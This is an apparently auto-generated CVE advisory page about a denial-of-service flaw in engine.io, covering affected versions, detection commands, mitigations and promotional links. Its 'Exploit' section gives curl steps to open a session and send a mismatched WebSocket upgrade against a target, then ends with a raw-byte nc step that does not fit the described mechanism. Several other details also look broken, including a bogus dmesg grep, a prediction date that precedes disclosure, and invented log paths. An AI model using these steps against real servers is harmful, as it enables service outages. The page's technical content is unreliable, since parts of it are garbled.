EngineIO/SocketIO, Protocol Revision Mismatch Denial of Service, CVE-2026-102599 (Medium) -DC-Sep2026-2647

Listen to this Post

CVE-2026-102599 is a denial-of-service vulnerability that affects Engine.IO and Socket.IO servers which permit transport upgrades. The Engine.IO protocol revision is negotiated during the initial handshake and stored on the session. However, a newly-created transport, including a WebSocket upgrade transport, could independently derive a different protocol revision from the upgrade request query parameters. The server did not verify that the protocol revision of an upgrade request matched the protocol revision of the existing session. A malicious client could exploit this mismatch by establishing a valid Engine.IO session and then sending an upgrade request with a different, or omitted, EIO query parameter. This could cause the server to attach a transport using a parser and heartbeat behavior inconsistent with the session. Under some conditions, a crafted heartbeat packet could trigger an uncaught exception and terminate the Node.js process. Servers using the default Engine.IO v4 protocol are impacted. The issue can be triggered even when Engine.IO v3 compatibility is disabled, because an omitted EIO parameter is interpreted as protocol v3 on the affected transport path. The impact is denial of service through process crash. Affected versions are engine.io >= 6.6.0, < 6.6.10. The issue was fixed in [email protected] and later. Users should upgrade to [email protected] or later. If using Socket.IO packages that depend on Engine.IO, users should update to a Socket.IO release that includes the patched Engine.IO version. Workarounds include disabling transport upgrades or allowing only a single transport. As an additional temporary mitigation, deployments may reject Engine.IO requests for an existing sid when the EIO query parameter is missing or does not match the protocol revision used during the initial handshake. Upgrading remains the recommended fix.

DailyCVE Form:

Platform: Engine.IO
Version: 6.6.0-6.6.9
Vulnerability: Protocol Mismatch
Severity: Medium
date: 2026-09-15

Prediction: 2026-09-03

What Undercode Say:

Analytics

Check installed engine.io version:

npm list engine.io

Verify Socket.IO dependency chain:

npm ls socket.io engine.io

Monitor for upgrade requests with missing EIO parameter:

grep "EIO" /var/log/engine.io/access.log

Detect abnormal WebSocket upgrade attempts:

tail -f /var/log/socket.io/upgrade.log | grep "upgrade"

Inspect running Node.js processes for crashes:

dmesg | grep -i "node.segfault"

Code snippet to log EIO parameter during handshake:

const io = require('socket.io')(httpServer);
io.engine.on('connection', (socket) => {
console.log('EIO:', socket.request._query.EIO);
});

Exploit: (Educational Purposes!)

Establish a valid Engine.IO session:

curl "http://target:3000/socket.io/?EIO=4&transport=polling"

Extract the sid from the response:

sid=$(curl -s "http://target:3000/socket.io/?EIO=4&transport=polling" | jq -r '.sid')

Send an upgrade request with a mismatched EIO parameter:

curl "http://target:3000/socket.io/?EIO=3&transport=websocket&sid=$sid" -H "Connection: Upgrade" -H "Upgrade: websocket"

Trigger the crash with a crafted heartbeat packet:

echo -e "\x00\x01\x02" | nc target 3000

Protection: from this CVE

Upgrade to [email protected] or later:

npm install [email protected]

Update Socket.IO to a release containing the patched Engine.IO.

Disable transport upgrades:

const io = new Server(httpServer, {
allowUpgrades: false
});

Allow only WebSocket transport:

const io = new Server(httpServer, {
transports: ["websocket"]
});

Reject mismatched EIO parameters at proxy or middleware layer:

io.engine.use((req, res, next) => {
const session = io.engine.clients[req.query.sid];
if (session && req.query.EIO !== session.protocol) {
return res.status(400).send('Protocol mismatch');
}
next();
});

Impact:

A remote unauthenticated attacker can cause a denial of service by crashing the Node.js process, disrupting all active connections and making the service unavailable.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top